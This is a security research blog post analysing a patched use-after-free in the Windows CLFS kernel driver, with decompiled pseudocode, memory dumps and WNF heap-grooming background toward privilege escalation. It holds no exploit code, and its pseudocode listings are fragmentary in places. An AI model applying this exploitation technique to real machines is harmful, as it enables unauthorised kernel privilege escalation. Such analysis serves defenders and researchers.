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Before yesterdayVulnerabily Research

Exploiting a use-after-free in Windows Common Logging File System (CLFS)

10 March 2022 at 17:47

By Arav Garg


This post analyzes a use-after-free vulnerability in clfs.sys, the kernel driver that implements the Common Logging File System, a general-purpose logging service that can be used by user-space and kernel-space processes in Windows. A method to exploit this vulnerability to achieve privilege escalation in Windows is also outlined.

Along with two other similar vulnerabilities, Microsoft patched this vulnerability in September 2021 and assigned the CVEs CVE-2021-36955, CVE-2021-36963, and CVE-2021-38633 to them. In the absence of any public information separating the three CVEs, we’ve decided to use CVE-2021-36955 to refer to the vulnerability described herein.

The Preliminaries section describes CLFS structures, Code Analysis explains the vulnerability with the help of code snippets, and the Exploitation section outlines the steps that lead to a functional exploit.


Common Log File System (CLFS) provides a high-performance, general-purpose log file subsystem that dedicated client applications can use and multiple clients can share to optimize log access. Any user-mode application that needs logging or recovery support can use CLFS. The following structures are taken from both the official documentation and a third-party’s unofficial documentation.

Every Base Log File is made up various records. These records are stored in sectors, which are written to in units of I/O called log blocks. These log blocks are always read and written in an atomic fashion to guarantee consistency.

Metadata Blocks

Every Base Log File is made up of various records. These records are stored in sectors, which are written to in units of I/O called log blocks. The Base Log File is composed of 6 different metadata blocks (3 of which are shadows), which are all examples of log blocks.

The three types of records that exist in such blocks are:

  • Control Record that contains info about layout, extend area and truncate area.
  • Base Record that contains symbol tables and info about the client, container and security contexts.
  • Truncate Record that contains info on every client that needs to have sectors changed as a result of a truncate operation.

Shadow Blocks

Three metadata records were defined above, yet six metadata blocks exist (and each metadata block only contains one record). This is due to shadow blocks, which are yet another technique used for consistency. Shadow blocks contain the previous copy of the metadata that was written, and by using the dump count in the record header, can be used to restore previously known good data in case of torn writes.

The following enumeration describes the six types of metadata blocks.


Control Record

The Control Record is always composed of two sectors, as defined by the constant below:


The Control Record is defined by the structure CLFS_CONTROL_RECORD, which is shown below:

typedef struct _CLFS_CONTROL_RECORD
    ULONGLONG ullMagicValue;
    UCHAR Version;
    CLFS_EXTEND_STATE eExtendState;
    USHORT iExtendBlock;
    USHORT iFlushBlock;
    ULONG cNewBlockSectors;
    ULONG cExtendStartSectors;
    ULONG cExtendSectors;
    USHORT cBlocks;
    ULONG cReserved;

After Version, the next set of fields are all related to CLFS Log Extension. This data could potentially be non-zero in memory, but for a stable Base Log File on disk, all of these fields are expected to be zero. This does not, of course, imply the CLFS driver or code necessarily makes this assumption.

The first CLFS Log Extension field, eExtendState, identifies the current extend state for the file using the enumeration below:

typedef enum _CLFS_EXTEND_STATE

The next two values iExtendBlock and iFlushBlock identify the index of the block being extended, followed by the block being flushed, the latter of which will normally be the shadow block. Next, the sector size of the new block is stored in cNewBlockSectors and the original sector size before the extend operation is stored in cExtendStartSectors. Finally, the number of sectors that were added is saved in cExtendSectors.

  • Block Context: The control record ends with the rgBlocks array, which defines the set of metadata blocks that exist in the Base Log File. Although this is expected to be 6, there could potentially exist additional metadata blocks, and so for forward support, the cBlocks field
    indicates the number of blocks in the array.

Each array entry is identified by the CLFS_METADATA_BLOCK structure, shown below:

typedef struct _CLFS_METADATA_BLOCK
        PUCHAR pbImage;
        ULONGLONG ullAlignment;
    ULONG cbImage;
    ULONG cbOffset;

On disk, the cbOffset field indicates the offset, starting from the control metadata block (i.e.: the first sector in the Base Log File). Of where the metadata block can be found. The cbImage field, on the other hand, contains the size of the corresponding block, while the eBlockType
corresponds to the previously shown enumeration of possible metadata block types.

In memory, an additional field, pbImage, is used to store a pointer to the data in kernel-mode memory.

CLFS In-Memory Class

Once in memory, a CLFS Base Log File is represented by a CClfsBaseFile class, which can be further extended by a CClfsBaseFilePersisted. The definition for the former can be found in public symbols and is shown below:

struct _CClfsBaseFile
    ULONG m_cRef;
    PUCHAR m_pbImage;
    ULONG m_cbImage;
    PERESOURCE m_presImage;
    USHORT m_cBlocks;
    PUSHORT m_rgcBlockReferences;
    CLFSHASHTBL m_symtblClient;
    CLFSHASHTBL m_symtblContainer;
    CLFSHASHTBL m_symtblSecurity;
    ULONGLONG m_cbContainer;
    ULONG m_cbRawSectorSize;
    BOOLEAN m_fGeneralBlockReferenced;

These fields mainly represent data seen earlier, such as the size of the container, the sector size, the array of metadata blocks and their number, as well as the size of the whole Base Log File and its location in kernel mode memory. Additionally, the class is reference counted, and almost any access to any of its fields is protected by the m_presImage lock, which is an executive resource accessed in either shared or exclusive mode. Finally, each block itself is also referenced in the m_rgcBlockReferences array, noting there’s a limit of 65535 references. When the general block has been referenced at least once, the m_fGeneralBlockReferenced boolean is used to indicate the fact.

Code Analysis

All code listings show decompiled C code; source code is not available in the affected product.
Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

Opening a Log File

The CreateLogFile() function in the Win32 API can be used to open an existing log. This function triggers a call to CClfsBaseFilePersisted::OpenImage() in clfs.sys. The pseudocode of CClfsBaseFilePersisted::OpenImage() is listed below:

long __thiscall
          (CClfsBaseFilePersisted *this,_UNICODE_STRING *ExtFileName,_CLFS_FILTER_CONTEXT *ClfsFilterContext,
          unsigned_char param_3,unsigned_char *param_4)




    Status = CClfsContainer::Open(this->CclfsContainer,ExtFileName,ClfsFilterContext,param_3,local_48);
    if ((int)Status < 0) {
        StatusDup = Status;
        if (Status != 0xc0000011) goto LAB_fffff80122689933;
    else {
        StatusDup = Status;
        UVar4 = CClfsContainer::GetRawSectorSize(this->field_0x98_CclfsContainer);
        this->rawsectorSize = UVar4;
        if ((0xfff < UVar4 - 1) || ((UVar4 & 0x1ff) != 0)) {
            Status = 0xc0000098;
            StatusDup = Status;
            goto LAB_fffff80122689933;


        Status = ReadImage(this,&ClfsControlRecord);
        if ((int)Status < 0) goto LAB_fffff801226897c8;
        StatusDup = Status;
        Status = CClfsContainer::GetContainerSize(this->CclfsContainer,&this->ContainerSize);
        StatusDup = Status;
        if ((int)Status < 0) goto LAB_fffff80122689933;
        ClfsBaseLogRecord = CClfsBaseFile::GetBaseLogRecord((CClfsBaseFile *)this);
        ControlRecord = ClfsControlRecord;
        if (ClfsBaseLogRecord != NULL) {



            if (ClfsControlRecord->eExtendState == 0) goto LAB_fffff80122689933;
            Block = ClfsControlRecord->iExtendBlock;
            if (((((Block != 0) && (Block < this->m_cBlocks)) && (Block < 6)) &&
                ((Block = ClfsControlRecord->iFlushBlock, Block != 0 && (Block < this->m_cBlocks)))) &&
               ((Block < 6 &&
                (m_cbContainer = CClfsBaseFile::GetSize((CClfsBaseFile *)this),
                ControlRecord->cExtendStartSectors < m_cbContainer >> 9 ||
                ControlRecord->cExtendStartSectors == m_cbContainer >> 9)))) {
                cExtendSectors>>1 = ControlRecord->cExtendSectors >> 1;
                uVar8 = (this->m_rgBlocks[ControlRecord->iExtendBlock].cbImage >> 9) + cExtendSectors>>1;
                if (ControlRecord->cNewBlockSectors < uVar8 || ControlRecord->cNewBlockSectors == uVar8) {


                    Status = ExtendMetadataBlock(this,(uint)ControlRecord->iExtendBlock,cExtendSectors>>1);
                    StatusDup = Status;
                    goto LAB_fffff80122689933;



After initializing some in-memory data structures, CClfsContainer:Open() is called to open the existing Base Log File at [1]. ReadImage() is then called to read the Base Log File at [2]. If the current extend state in the Extend Context is not ClfsExtendStateNone(0) at [3], the
possibility to expand the Base Log File is explored.

If the original sector size before the previous extension (ControlRecord->cExtendStartSectors) is less than or equal to the current sector size of
the Base Log File (m_cbContainer), and the sector size of the Block (to be expanded) after the previous extension (ControlRecord->cNewBlockSectors) is less than or equal to the latest required sector size (current sector size of the Block to be expanded this->m_rgBlocks[ControlRecord->iExtendBlock].cbImage >> 9 plus the number of sectors previously added cExtendSectors >> 1), the Base Log File needs expansion. ExtendMetadataBlock() is duly called at [4].


  • In all non-malicious cases, the current extend state is expected to be ClfsExtendStateNone(0) when the log file is written to disk.
  • Since the Extend Context is under attacker control (described below), all the fields discussed above can be set by the attacker.

Reading Base Log File

The CClfsBaseFilePersisted::ReadImage() function called at [2] is responsible for reading the Base Log File from disk. The pseudocode of this function is listed below:

int CClfsBaseFilePersisted::ReadImage
              (CClfsBaseFilePersisted *BaseFilePersisted,_CLFS_CONTROL_RECORD **ClfsControlRecordPtr)




    BaseFilePersisted->m_cBlocks = 6;
    m_rgBlocks = (CLFS_METADATA_BLOCK *)ExAllocatePoolWithTag(0x200,0x90,0x73666c43);
    BaseFilePersisted->m_rgBlocks = m_rgBlocks;



        memset(BaseFilePersisted->m_rgBlocks,0,(ulonglong)BaseFilePersisted->m_cBlocks * 0x18);
        memset(BaseFilePersisted->m_rgcBlockReferences,0,(ulonglong)BaseFilePersisted->m_cBlocks * 2);


        BaseFilePersisted->m_rgBlocks->cbOffset = 0;
        BaseFilePersisted->m_rgBlocks->cbImage = BaseFilePersisted->m_cbRawSectorSize * 2;
        BaseFilePersisted->m_rgBlocks[1].cbOffset = BaseFilePersisted->m_cbRawSectorSize * 2;
        BaseFilePersisted->m_rgBlocks[1].cbImage = BaseFilePersisted->m_cbRawSectorSize * 2;


        local_48 = CClfsBaseFile::GetControlRecord((CClfsBaseFile *)BaseFilePersisted,ClfsControlRecordPtr);


                        p_Var2 = BaseFilePersisted->m_rgBlocks->pbImage;
                        for (; (uint)indexIter < (uint)BaseFilePersisted->m_cBlocks;
                            indexIter = (ulonglong)((uint)indexIter + 1)) {
                            ControlRecorD = *ClfsControlRecordPtr;
                            pCVar3 = BaseFilePersisted->m_rgBlocks;
                            pCVar1 = ControlRecorD->rgBlocks + indexIter;
                            uVar6 = *(undefined4 *)((longlong)&pCVar1->pbImage + 4);
                            uVar5 = pCVar1->cbImage;
                            uVar7 = pCVar1->cbOffset;
                            m_rgBlocks = pCVar3 + indexIter;
                            *(undefined4 *)&m_rgBlocks->pbImage = *(undefined4 *)&pCVar1->pbImage;
                            *(undefined4 *)((longlong)&m_rgBlocks->pbImage + 4) = uVar6;
                            m_rgBlocks->cbImage = uVar5;
                            m_rgBlocks->cbOffset = uVar7;
                            pCVar3[indexIter].eBlockType = ControlRecorD->rgBlocks[indexIter].eBlockType;
                            BaseFilePersisted->m_rgBlocks[indexIter].pbImage = NULL;
                        BaseFilePersisted->m_rgBlocks->pbImage = p_Var2;
                        BaseFilePersisted->m_rgBlocks[1].pbImage = p_Var2;


                        local_48 = CClfsBaseFile::AcquireMetadataBlock(BaseFilePersisted,ClfsMetaBlockGeneral);
                        if (-1 < (int)local_48) {
                            BaseFilePersisted->field_0x94 = '\x01';
                        goto LAB_fffff80654e09f9e;



The in-memory buffer of the rgBlocks array, which defines the set of metadata blocks that exist in the Base Log File, is allocated (m_rgBlocks) at [5]. Each array entry is identified by the CLFS_METADATA_BLOCK structure, which is of size 0x18. The cBlocks field, which indicates the number of blocks in the array, is set to the default value 6 (Hence, the size of allocation for m_rgBlocks is 0x18 * 6 = 0x90).

The content in m_rgBlocks is initialized to 0 at [6]. The first two entries in m_rgBlocks are for the Control Record and its shadow, both of which have a fixed size of 0x400. The sizes and offsets for these blocks are duly set at [7].

At this stage, m_rgBlocks looks like the following in memory:

ffffc60c`53904380  00000000`00000000 00000000`00000400
ffffc60c`53904390  00000000`00000000 00000000`00000000
ffffc60c`539043a0  00000400`00000400 00000000`00000000
ffffc60c`539043b0  00000000`00000000 00000000`00000000
ffffc60c`539043c0  00000000`00000000 00000000`00000000
ffffc60c`539043d0  00000000`00000000 00000000`00000000
ffffc60c`539043e0  00000000`00000000 00000000`00000000
ffffc60c`539043f0  00000000`00000000 00000000`00000000
ffffc60c`53904400  00000000`00000000 00000000`00000000

CClfsBaseFile::GetControlRecord() is called to retrieve the Control Record from the Base Log File at [8]. The pbImage field in the first two entries in m_rgBlocks are duly populated. More on this below.

At this stage, m_rgBlocks contains the following values:

ffffc60c`53904380  ffffb60a`b7c79b40 00000000`00000400
ffffc60c`53904390  00000000`00000000 ffffb60a`b7c79b40
ffffc60c`539043a0  00000400`00000400 00000000`00000000
ffffc60c`539043b0  00000000`00000000 00000000`00000000
ffffc60c`539043c0  00000000`00000000 00000000`00000000
ffffc60c`539043d0  00000000`00000000 00000000`00000000
ffffc60c`539043e0  00000000`00000000 00000000`00000000
ffffc60c`539043f0  00000000`00000000 00000000`00000000
ffffc60c`53904400  00000000`00000000 00000000`00000000

The rgBlocks array from the Control Record is copied into m_rgBlocks at [9]. Thus, the sizes and corresponding offsets of each of the metadata blocks is saved.

ffffc60c`53904380  ffffb60a`b7c79b40 00000000`00000400
ffffc60c`53904390  00000000`00000000 ffffb60a`b7c79b40
ffffc60c`539043a0  00000400`00000400 00000000`00000001
ffffc60c`539043b0  00000000`00000000 00000800`00007a00
ffffc60c`539043c0  00000000`00000002 00000000`00000000
ffffc60c`539043d0  00008200`00007a00 00000000`00000003
ffffc60c`539043e0  00000000`00000000 0000fc00`00000200
ffffc60c`539043f0  00000000`00000004 00000000`00000000
ffffc60c`53904400  0000fe00`00000200 00000000`00000005

AcquireMetadataBlock() is called with the second parameter set to ClfsMetaBlockGeneral to read in the General Metadata Block from the Base Log File at [10]. The pbImage field for the corresponding entry and its shadow in m_rgBlocks are duly populated. More on this below.

At this stage, m_rgBlocks looks like the following in memory:

ffffc60c`53904380  ffffb60a`b7c79b40 00000000`00000400
ffffc60c`53904390  00000000`00000000 ffffb60a`b7c79b40
ffffc60c`539043a0  00000400`00000400 00000000`00000001
ffffc60c`539043b0  ffffb60a`b9ead000 00000800`00007a00
ffffc60c`539043c0  00000000`00000002 ffffb60a`b9ead000
ffffc60c`539043d0  00008200`00007a00 00000000`00000003
ffffc60c`539043e0  00000000`00000000 0000fc00`00000200
ffffc60c`539043f0  00000000`00000004 00000000`00000000
ffffc60c`53904400  0000fe00`00000200 00000000`00000005

It is important to note that the pbImage field for the General Metadata Block and its shadow point to the same memory (refer [17] and [20]).

Reading Control Record

Internally, CClfsBaseFilePersisted::ReadImage() calls CClfsBaseFile::GetControlRecord() to retrieve the Control Record. The pseudocode of
CClfsBaseFile::GetControlRecord() is listed below:

long __thiscall CClfsBaseFile::GetControlRecord(CClfsBaseFile *this,_CLFS_CONTROL_RECORD **ClfsControlRecordptr)

    uint iVar4;
    astruct_12 *lVar3;
    uint RecordOffset;
    uint cbImage;

    *ClfsControlRecordptr = NULL;


    iVar4 = AcquireMetadataBlock((CClfsBaseFilePersisted *)this,0);
    if (-1 < (int)iVar4) {
        cbImage = this->m_rgBlocks->cbImage;
        ControlMetadataBlock = this->m_rgBlocks->pbImage;
        RecordOffset = pbImage->RecordOffsets[0];
        if (((RecordOffset < cbImage) && (0x6f < RecordOffset)) && (0x67 < cbImage - RecordOffset)) {


            *ClfsControlRecordptr =
                 (_CLFS_CONTROL_RECORD *)((longlong)ControlMetadataBlock->RecordOffsets + ((ulonglong)RecordOffset - 0x28));
        else {
            iVar4 = 0xc01a000d;
    return (long)iVar4;

AcquireMetadataBlock() is called with the second parameter of type _CLFS_METADATA_BLOCK_TYPE set to ClfsMetaBlockControl (0) to acquire the
Control MetaData Block at [11]. The record offset is retrieved and used to calculate the address of the Control Record, which is saved at [12].

Acquiring Metadata Block

The CClfsBaseFile::AcquireMetadataBlock() function is used to acquire a metadata block. The pseudocode of this function is listed below:

int CClfsBaseFile::AcquireMetadataBlock
              (CClfsBaseFilePersisted *ClfsBaseFilePersisted,_CLFS_METADATA_BLOCK_TYPE BlockType)

    ulong lVar1;
    longlong BlockTypeDup;

    lVar1 = 0;
    if (((int)BlockType < 0) || ((int)(uint)ClfsBaseFilePersisted->m_cBlocks <= (int)BlockType)) {
        lVar1 = 0xc0000225;
    else {
        BlockTypeDup = (longlong)(int)BlockType;


        ClfsBaseFilePersisted->m_rgcBlockReferences[BlockTypeDup] =
             ClfsBaseFilePersisted->m_rgcBlockReferences[BlockTypeDup] + 1;


        if ((ClfsBaseFilePersisted->m_rgcBlockReferences[BlockTypeDup] == 1) &&
           (lVar1 = (*ClfsBaseFilePersisted->vftable->field_0x8)(ClfsBaseFilePersisted,BlockType), (int)lVar1 < 0))
            ClfsBaseFilePersisted->m_rgcBlockReferences[BlockTypeDup] =
                 ClfsBaseFilePersisted->m_rgcBlockReferences[BlockTypeDup] - 1;
    return (int)lVar1;

The m_rgcBlockReferences entry for the Control Metadata Block is increased by 1 to signal its usage at [13].

If the reference count is 1, it is clear the Control Metadata Block was not being actively used (prior to this). In this case, it needs to be read from disk. The second entry in the virtual function table is set to CClfsBaseFilePersisted::ReadMetadataBlock(), which is duly called at [14].

Read Metadata Block

The CClfsBaseFilePersisted::ReadMetadataBlock() function is used to read a metadata block from disk. The pseudocode of this function is listed below:

ulong __thiscall
CClfsBaseFilePersisted::ReadMetadataBlock(CClfsBaseFilePersisted *this,_CLFS_METADATA_BLOCK_TYPE BlockType)




    cbImage = this->m_rgBlocks[(longlong)_BlockTypeDup].cbImage;
    cbOffset = (PIRP)(ulonglong)this->m_rgBlocks[(longlong)_BlockTypeDup].cbOffset;
    if (cbImage == 0) {
        uVar3 = 0;
    else {
        if (0x6f < cbImage) {


            ClfsMetadataBlock =
                 (_CLFS_LOG_BLOCK_HEADER *)ExAllocatePoolWithTag(PagedPoolCacheAligned,(ulonglong)cbImage,0x73666c43);
            if (ClfsMetadataBlock == NULL) {
                uVar1 = 0xc000009a;
            else {


                this->m_rgBlocks[(longlong)_BlockTypeDup].pbImage = ClfsMetadataBlock;
                *(undefined4 *)&this->field_0xc8 = 0;
                this->field_0xd0 = 0;
                local_40 = local_40 & 0xffffffff00000000;
                local_50 = CONCAT88(local_50._8_8_,ClfsMetadataBlock);


                uVar5 = CClfsContainer::ReadSector
                                  ((ULONG_PTR)this->CclfsContainer,this->ObjectBody,NULL,(longlong *)local_50,
                                   cbImage >> 9,&cbOffset);
                uVar3 = (ulong)uVar5;
                if (((int)uVar3 < 0) ||
                   (uVar3 = KeWaitForSingleObject(this->ObjectBody,Executive,'\0','\0',NULL), (int)uVar3 < 0))
                goto LAB_fffff801226841ad;
                this_00 = (CClfsBaseFilePersisted *)ClfsMetadataBlock;


                uVar3 = ClfsDecodeBlock(ClfsMetadataBlock,cbImage >> 9,*(unsigned_char *)&ClfsMetadataBlock->UpdateCount


                    ShadowBlockType = BlockType + ClfsMetaBlockControlShadow;
                    uVar6 = (ulonglong)ShadowBlockType;

                            this->m_rgBlocks[ShadowBlockTypeDup].pbImage = NULL;
                            this->m_rgBlocks[ShadowBlockTypeDup].cbImage =


                            this->m_rgBlocks[ShadowBlockTypeDup].pbImage =


The size of the Metadata block to be read is retrieved and saved in cbImage. Note that these sizes are stored in the Control Record of the Base Log File.

To read the Control Record, the hardcoded value is taken at [15], as the Control Record is of a fixed size. Memory (ClfsMetadataBlock) is allocated to read the metadata block from disk at [16]. The corresponding pbImage entry in m_rgBlocks is filled in and ClfsMetadataBlock is initialized to 0 at [17]. The function CClfsContainer::ReadSector() is called to read the specified number of sectors from disk at [18].

ClfsMetadataBlock now contains the exact contents of the metadata Block as present in the file. It is important to note that the Control Metadata Block contains the Control Context as described earlier. Thus, the contents of the Control Context are fully controlled by the attacker.
ClfsMetadataBlock is decoded via a call to ClfsDecodeBlock at [19]. It is also important to note that in the case of the Control Metadata Block, this does not modify any field in the Control Context. The corresponding shadow pbImage entry in m_rgBlocks is also set to ClfsMetadataBlock at [20].

Extending Metadata Block

The call to ExtendMetadataBlock() at [4] is used to extend the size of a particular metadata block in the Base Log File. The pseudocode of this function pertaining to when the current extend state is ClfsExtendStateFlushingBlock(2) is listed below:

long __thiscall
          (CClfsBaseFilePersisted *this,_CLFS_METADATA_BLOCK_TYPE BlockType,unsigned_long cExtendSectors>>1)


    do {
        ret = retDup;
        if (*ExtendPhasePtr != 2) break;
        iFlushBlockPtr = &ClfsControlRecordDup->iFlushBlock;
        iExtendBlockPtr = &ClfsControlRecordDup->iExtendBlock;


        iFlushBlock = *iFlushBlockPtr;
        iFlushBlockDup = (ulonglong)iFlushBlock;
        iExtendBlock = *iExtendBlockPtr;
        iFlushBlockDup2 = (uint)iFlushBlock;


        if (((iFlushBlock == iExtendBlock) ||
            (uVar4 = IsShadowBlock(this_00,iFlushBlockDup2,(uint)iExtendBlock),
            uVar4 != (unsigned_char)0x0)) &&
           (this->m_rgBlocks[iFlushBlockDup].cbImage >> 9 <
            ClfsControlRecordDup->cNewBlockSectors)) {
                       ClfsControlRecordDup->cExtendSectors >> 1);
            iFlushBlockDup = (ulonglong)*iFlushBlockPtr;
        WriteMetadataBlock(this,(uint)iFlushBlockDup & 0xffff,(unsigned_char)0x0);
        if (*puVar1 == *puVar2) {
            *ExtendPhasePtr = 0;
        else {
            *puVar1 = *puVar1 - 1;


            ret = ProcessCurrentBlockForExtend(this,ClfsControlRecordDup);
            retDup = ret;
            if ((int)ret < 0) break;


The index of the block being extended (iFlushBlock) and the block being flushed (iExtendBlock) are extracted from the Extend Context in the Control Record of the Base Log File at [21]. With specially crafted values of the above fields and cNewBlockSectors at [22], code execution reaches ProcessCurrentBlockForExtend() at [23]. ProcessCurrentBlockForExtend() internally calls ExtendMetadataBlockDescriptor(), whose pseudocode is listed below:

long __thiscall
          (CClfsBaseFilePersisted *this,_CLFS_METADATA_BLOCK_TYPE iFlushBlock,unsigned_long cExtendSectors>>1)



    iFlushBlockDup = (ulonglong)iFlushBlock;
    NewMetadataBlock = NULL;
    RecordHeader = NULL;
    iVar13 = 0;
    uVar3 = this->m_cbRawSectorSize;
    if (uVar3 == 0) {
        NewSize = 0;
    else {
        NewSize = (uVar3 - 1) + this->m_rgBlocks[iFlushBlockDup].cbImage + cExtendSectors>>1 * 0x200 & -uVar3;
    RecordsParamsPtr = this->m_rgBlocks;
    pCVar1 = RecordsParamsPtr + iFlushBlockDup;
    uVar4 = *(undefined4 *)&pCVar1->pbImage;
    uVar5 = *(undefined4 *)((longlong)&pCVar1->pbImage + 4);
    uVar3 = pCVar1->cbImage;
    uVar6 = pCVar1->cbOffset;
    CVar2 = RecordsParamsPtr[iFlushBlockDup].eBlockType;
    ShadowIndex._0_4_ = iFlushBlock + ClfsMetaBlockControlShadow;
    ShadowIndex = (ulonglong)(uint)ShadowIndex;
    uVar7 = IsShadowBlock((CClfsBaseFilePersisted *)ShadowIndex,iFlushBlock,(uint)ShadowIndex);
    if ((uVar7 == (unsigned_char)0x0) &&
       (uVar7 = IsShadowBlock((CClfsBaseFilePersisted *)ShadowIndex,(unsigned_long)ShadowIndex,iFlushBlock),
       uVar7 != (unsigned_char)0x0)) {
        if (RecordsParamsPtr[iFlushBlockDup].pbImage != NULL) {


            this->m_rgBlocks[iFlushBlockDup].pbImage = NULL;
            RecordsParamsPtr = this->m_rgBlocks;
            ShadowIndex = (ulonglong)(iFlushBlock + ClfsMetaBlockControlShadow);


        RecordsParamsPtr[iFlushBlockDup].cbImage = RecordsParamsPtr[ShadowIndex].cbImage;
        m_rgBlocksDup = this->m_rgBlocks;
        m_rgBlocksDup[iFlushBlockDup].pbImage = m_rgBlocks[ShadowIndex].pbImage;


With carefully crafted values in the Control Record of the Base Log File, code execution reaches [24].

At this stage, m_rgBlocks looks like the following in memory:

ffffc60c`53904380  ffffb60a`b7c79b40 00000000`00000400
ffffc60c`53904390  00000000`00000000 ffffb60a`b7c79b40
ffffc60c`539043a0  00000400`00000400 00000000`00000001
ffffc60c`539043b0  ffffb60a`b9ead000 00000800`00007a00
ffffc60c`539043c0  00000000`00000002 ffffb60a`b9ead000
ffffc60c`539043d0  00008200`00007a00 00000000`00000003
ffffc60c`539043e0  00000000`00000000 0000fc00`00000200
ffffc60c`539043f0  00000000`00000004 00000000`00000000
ffffc60c`53904400  0000fe00`00000200 00000000`00000005

It is important to note that the pbImage field for the General Metadata Block and its shadow point to the same memory (refer to [17] and [20]). The pbImage field of the iFlushBlock index in m_rgBlocks is freed, and the corresponding entry is cleared at [24]. For example, if iFlushBlock is set to 2, m_rgBlocks looks like the following in memory:

ffffc60c`53904380  ffffb60a`b7c79b40 00000000`00000400
ffffc60c`53904390  00000000`00000000 ffffb60a`b7c79b40
ffffc60c`539043a0  00000400`00000400 00000000`00000001
ffffc60c`539043b0  00000000`00000000 00000800`00007a00
ffffc60c`539043c0  00000000`00000002 ffffb60a`b9ead000
ffffc60c`539043d0  00008200`00007a00 00000000`00000003
ffffc60c`539043e0  00000000`00000000 0000fc00`00000200
ffffc60c`539043f0  00000000`00000004 00000000`00000000
ffffc60c`53904400  0000fe00`00000200 00000000`00000005

The entry is then repopulated with the shadow index entry at [25].

ffffc60c`53904380  ffffb60a`b7c79b40 00000000`00000400
ffffc60c`53904390  00000000`00000000 ffffb60a`b7c79b40
ffffc60c`539043a0  00000400`00000400 00000000`00000001
ffffc60c`539043b0  ffffb60a`b9ead000 00000800`00007a00
ffffc60c`539043c0  00000000`00000002 ffffb60a`b9ead000
ffffc60c`539043d0  00008200`00007a00 00000000`00000003
ffffc60c`539043e0  00000000`00000000 0000fc00`00000200
ffffc60c`539043f0  00000000`00000004 00000000`00000000
ffffc60c`53904400  0000fe00`00000200 00000000`00000005

Since the original entry and the shadow index entry pointed to the same memory, the repopulation leaves a reference to freed memory. Any use of the General Metadata Block will refer to this freed memory, resulting in a Use After Free.

The vulnerability can be converted to a double free by closing the handle to the Base Log File. This will trigger a call to FreeMetadataBlock, which will free all pbImage entries in m_rgBlocks.


A basic understanding of the segment heap in the windows kernel introduced since the 19H1 update is required to understand the exploit mechanism. The paper titled β€œScoop the Windows 10 pool!” from SSTIC 2020 describes this mechanism in detail.

Windows Notification Facility

Objects from Windows Notification Facility (WNF) are used to groom the heap and convert the use after free into a full exploit. A good understanding of WNF is thus required to understand the exploit. The details about WNF described below are taken from the following sources:

Creating WNF State Name

When a WNF State Name is created via a call to NtCreateWnfStateName(), ExpWnfCreateNameInstance() is called internally to create a name
instance. The pseudocode of ExpWnfCreateNameInstance() is listed below:

          (_WNF_SCOPE_INSTANCE *ScopeInstance,_WNF_STATE_NAME *StateName,undefined4 *param_3,_KPROCESS *param_4,
          _EX_RUNDOWN_REF **param_5)



    uVar23 = (uint)((ulonglong)StateName >> 4) & 3;
    if ((PsInitialSystemProcess == Process) || (uVar23 != 3)) {
        SVar20 = 0xb8;
        if (*(longlong *)(param_3 + 2) == 0) {
            SVar20 = 0xa8;
        NameInstance = (_WNF_NAME_INSTANCE *)ExAllocatePoolWithTag(PagedPool,SVar20,0x20666e57);
    else {
        SVar20 = 0xb8;
        if (*(longlong *)(param_3 + 2) == 0) {


            SVar20 = 0xa8;


        NameInstance = (_WNF_NAME_INSTANCE *)ExAllocatePoolWithQuotaTag(9,SVar20,0x20666e57);

A chunk of size 0xa8 (as seen at [1]) is allocated from the Paged Pool at [2] as a structure of type _WNF_NAME_INSTANCE. This results in an allocation of size 0xc0 from the LFH. This structure is listed below:

    struct _WNF_NODE_HEADER Header;                                         //0x0
    struct _EX_RUNDOWN_REF RunRef;                                          //0x8
    struct _RTL_BALANCED_NODE TreeLinks;                                    //0x10

    // [3]

    struct _WNF_STATE_NAME_STRUCT StateName;                                //0x28
    struct _WNF_SCOPE_INSTANCE* ScopeInstance;                              //0x30
    struct _WNF_STATE_NAME_REGISTRATION StateNameInfo;                      //0x38
    struct _WNF_LOCK StateDataLock;                                         //0x50

    // [4]

    struct _WNF_STATE_DATA* StateData;                                      //0x58
    ULONG CurrentChangeStamp;                                               //0x60
    VOID* PermanentDataStore;                                               //0x68
    struct _WNF_LOCK StateSubscriptionListLock;                             //0x70
    struct _LIST_ENTRY StateSubscriptionListHead;                           //0x78
    struct _LIST_ENTRY TemporaryNameListEntry;                              //0x88

    // [5]

    struct _EPROCESS* CreatorProcess;                                       //0x98
    LONG DataSubscribersCount;                                              //0xa0
    LONG CurrentDeliveryCount;                                              //0xa4

Relevant entries in the _WNF_NAME_INSTANCE structure include:

  • StateName: Uniquely identifies the name instance, shown at [3].
  • StateData: Stores the data associated with the instance, shown at [4].
  • CreatorProcess: Stores the address of the _EPROCESS structure of the process that created the name instance, shown at [5].

The StateData is headed by a structure of type _WNF_STATE_DATA. This structure is listed below:

    // [6]

    struct _WNF_NODE_HEADER Header;                                         //0x0

    // [7]

    ULONG AllocatedSize;                                                    //0x4
    ULONG DataSize;                                                         //0x8
    ULONG ChangeStamp;                                                      //0xc

The StateData pointer is referred to when the WNF State Data is updated and queried. The variable-size data immediately follows the _WNF_STATE_DATA structure.

Updating WNF State Data

When the WNF State Data is updated via a call to NtUpdateWnfStateData(), ExpWnfWriteStateData() is called internally to write to the StateData pointer. The pseudocode of ExpWnfWriteStateData() is listed below.

void ExpWnfWriteStateData
               (_WNF_NAME_INSTANCE *NameInstance,void *InputBuffer,ulonglong Length,int MatchingChangeStamp,
               int CheckStamp)



    if (NameInstance->StateData != (_WNF_STATE_DATA *)0x1) {


        StateData = NameInstance->StateData;
    LengtH = (uint)(Length & 0xffffffff);


    if (((StateData == NULL) && ((NameInstance->PermanentDataStore != NULL || (LengtH != 0)))) ||


       ((StateData != NULL && (StateData->AllocatedSize < LengtH)))) {



            StateData = (_WNF_STATE_DATA *)ExAllocatePoolWithQuotaTag(9,(ulonglong)(LengtH + 0x10),0x20666e57);



        StateData->Header = (_WNF_NODE_HEADER)0x100904;
        StateData->AllocatedSize = LengtH;



        RtlCopyMemory(StateData + 1,InputBuffer,Length & 0xffffffff);
        StateData->DataSize = LengtH;
        StateData->ChangeStamp = uVar5;


    __security_check_cookie(local_30 ^ (ulonglong)&stack0xffffffffffffff08);

The InputBuffer and Length parameters to the function contain the contents and size of the data. It is important to note that these can be controlled by a user.

